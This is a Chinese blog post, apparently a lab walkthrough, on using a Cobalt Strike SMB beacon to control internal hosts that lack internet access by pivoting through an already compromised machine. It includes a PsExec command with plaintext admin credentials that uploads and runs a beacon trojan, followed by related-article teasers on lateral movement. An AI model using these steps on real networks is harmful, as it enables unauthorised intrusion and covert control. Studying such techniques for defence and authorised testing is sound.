cs利用smb上线内网不出网主机

最新推荐文章于 2024-05-25 21:25:40 发布
最新推荐文章于 2024-05-25 21:25:40 发布
阅读量2.8k 收藏 5
点赞数
分类专栏: 后渗透、内网学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41598660/article/details/109196489
版权

实战中打入内网经常会碰到内网中存在不出网的主机。
在这里插入图片描述

实验

win7通外网也和域内不出网主机相通,域内不出网主机ip10.0.0.3
前提该出网主机已经被成功拿下。
在这里插入图片描述

利用这个机子作为中间人,创建一个listen,Name这里我设置为smb1。
在这里插入图片描述

选择 Attacks->Packages->Windows Executable(Stageless),生成exe、dll木马文件都可以
在这里插入图片描述

生成的beacon.exe木马文件。并将该木马文件上传至目标主机,这里我同时上传了PsExec.exe工具进行一个横向,因为实战中发现cs本身的横向工具不太给力。(在cs4.0中, 可以直接使用jump psexec命令)
在这里插入图片描述
利用psexec的远程上传并执行的功能(-d参数), 通过10.0.0.123主机横向获取10.0.0.3主机权限后利用smb445端口上线内网不出网主机。主要是通过出网机作为一个中间人,10.0.0.3主机成功上线后,通过端口连接可以看得出来。所有出网机一断开,不出网主机也会断。

shell C:\Users\AF.AUFENG\psexec -accepteula \\10.0.0.123,10.0.0.3 -u administrator -p Ojf123456789 -d -c C:\Users\AF.AUFENG\beacon.exe

在这里插入图片描述

努力的学渣'#
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CS学习笔记】7、SMBbean的作用
TeamsSix 的 CSDN 空间
05-29 578
0x00 SMB Beacon 简介 SMB Beacon 使用命名管道通过一个父 Beacon 进行通信。这种对等通信对同一台主机上的 Beacon 和跨络的 Beacon 都有效。Windows 将命名管道通信封装在 SMB 协议中。因此得名 SMB Beacon。 因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效(系统防火墙默认是允许445的端口与外界通信的,其他端口可能会弹窗提醒,会导致远程命令行反弹s
asp.net下利用JS实现对后台CS代码的调用方法
10-30
ASP.NET 中使用 JavaScript 调用后台 CS 代码的方法 在 ASP.NET 中,经常需要使用 JavaScript 调用后台 CS 代码,以实现某些特定的功能。例如,在 GridView 中,某些行没有处理过的,用户点击该行后,即表示用户...
巧用smb拿下不出主机
渗透测试研究中心
01-24 393
0x00 前言之前在打一个域环境的时候出现了域内主机不出的情况,当时用的是cs的socks代理将不出主机的流量代理到了边缘主机上。当时没有考虑太多,下来之后想到搭一个环境复现一下当时的情况,看有没有更简便的方法能够打下不出主机。机缘巧合之下,发现了这个域环境还不错,再复现的过程中也有一些知识触及了我的知识盲区,也收获了许多新的知识。特地把过程记录下来,与想要学习打域内不出主机的师傅们共...
内网渗透(不出上线CS
最新发布
qq_64302290的博客
05-25 1149
cs是一款强大的控制windows木马的工具。是目前渗透中常使用的一个工具。
CS_Smb_Beacon上线不出机器
huohaowen的博客
02-22 743
来讲一下上线不出的机器的cs自带的办法
Metasploit使用内网跳板, 扫描局域主机
dianyan5615的博客
06-21 1078
  最近,拿到一台内网机器, 苦于无法使用nmap扫描改主机内网, 所以才有此文   在跳板机子获取一定权限后,需要积极的向内网主机权限发展,获取指定的目标信息,探查系统漏洞,借助msf已经得到的meterpreter后门,可以使系列的操作更容易。   使用Meterpreter内置的添加路由功能   获取路由信息 run get_local_subnets   ...
内网安全】代理Socks协议&路由不出&后渗透通讯&CS-MSF控制上线
今天是几号的博客
03-18 1478
先将msf代理流量转发至本地1234端口,然后使用代理工具连接该端口,进行流量转发。注意:实验之前查看靶机操作系统是否是64位,否则使用msf生成x84架构的木马。SocksCap Proxifier ProxyChains等。忽略细节,将msf_7777放置windows 7上,直接上线。#络通讯-MSF&CS-路由添加&节点建立。#控制上线-MSF&CS-协议生成&正反连接。监听器:bind_tcp port。操作:代理转发-Socks代理。msf 内网流量转发代理。cs 内网流量转发代理。
利用百度api进行人脸识别用BS和CS两种方式来实现
07-18
如果使用C/S方式实现,需要有一个客户端和一个服务器端 客户端和服务器通过TCP协议连接传输数据 客户端负责读取本地图片,并把图片传给服务器 服务器接收到客户端的图片后,调用百度API接口进行人脸识别 ...
配置实现虚拟机linux系统与宿主机Windows系统络互通.pdf
11-19
//
BCM943602CS 苹果拆机卡 windows驱动
09-10
BCM943602CS是一款源自苹果设备的无线卡,常见于MacBook Pro或Air等型号。这款卡采用Broadcom(博通)公司的技术,提供了高速的Wi-Fi和蓝牙连接功能。在Windows操作系统中,由于硬件与苹果原生系统间的差异,...
苹果笔记本卡BCM94360CS2 windows驱动大全
01-16
苹果BCM94360CS2卡的Windows驱动,该卡黑苹果免驱,win下驱动不太好找。各个版本的都包含了,包括蓝牙和WiFi,含推荐的Win10下驱动,在我的机器上蓝牙正常,wifi 2.4和5G均正常。如果推荐的不行可以试试其他的...
CS拿下目标主机及相关操作
m0_53108656的博客
03-05 150
cobalt strik使用
cs的常用命令操作
Shanfenglan's blog
01-11 5114
信息收集 #列出正在登陆的用户 net logons #列出域控(组) net domain_controllers #列出域控列表 net dclist #显示当前域 net domain #列出当前session net sessions #列出盘符 drives 列出当前执行时间很久的任务并删除 jobs jobkill 取消正在下载的文件 cancel 1.txt 创建凭据并执行命令(无回显) 工作组中如果两个机器密码或者说登陆凭据是相同的,那么可以直接dir \ip\c$ 成
cs和msf实现内网横向移动2
wuxinweii的博客
10-28 750
一、使用CS的psexec实现哈希攻击 1.在扫描完内网其他主机后选择一台需要传递的主机 2.实验之前必须已经获得用户名的哈希值或明文密码 右键选择jump—>psexec功能 2.配置参数 选择一个用户名密码和参数,但必须与需要传递的主机信息一致 选择一个监听器和一个已经得到的session 3.执行命令查看结果 传递成功 上线成功 二、使用msf的psexec功能 如果cs一直无法传递,可以试试使用msf的psexec功能 1.配置进入内网路由(前面一篇文章有做法) 2.使用use exp
内网中的简单横向移动
Amire0x的小乐园
11-30 1625
横向移动 WMI 简介 全程Windows管理规范,从03开始一直存在 由一系列工具组成,可以在本地或者远程管理计算机系统 Windows默认不会讲WMI的操作记录在日志中 利用 条件 WMI服务开启,135端口,默认开启 防火墙允许135,445等端口通信 测试方法 nmap -p 135 ip telnet ip 135 ...... 管理员权限,及本地管理员组 wmic 用powershell联动cs wmic /node:<目标 ip> /user:<用户或域
内网安全-CS】Cobalt Strike启动运行&上线方法&插件
12-19 9807
内网安全-CS】Cobalt Strike启动运行&上线方法&插件加载
不出主机的几种上线方式
mingyqf的博客
03-10 1298
原文链接:https://www.anquanke.com/post/id/254671#h2-7 不出主机的几种上线方式 作者:SD 分享到: 发布时间:2021-11-02 10:30:15 前言 拿到一台边缘机器后,内网的机器很有可能大多数都不出,这时又想上线cs方便后续操作。本文就如何上线不出主机的方式进行了总结。 环境搭建 目标内网机器 os:win server 2012 ip:192.168.57.137 边缘机器 os:win server 2012 ip1:19
[跳板机] 如何通过跳板机连接内网[ssh][cmd & winSCP & Pycharm]
日渐头秃
02-02 2306
首先,你得有个内网的跳板机。没有的话请退出。 目录 winSCP cmd链接 pycharm连接 需要的东西 跳板机IP 跳板机密码/密钥文件 内网服务器IP 内网服务器的用户名和密码 先说下密钥文件,因为我碰到了问题。 windows环境下,需要把文件移动到自己的用户文件夹中,否则会无法跳转。即:C:\Users\用户名 Linux环境下,改下文件权限即可 winSCP ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值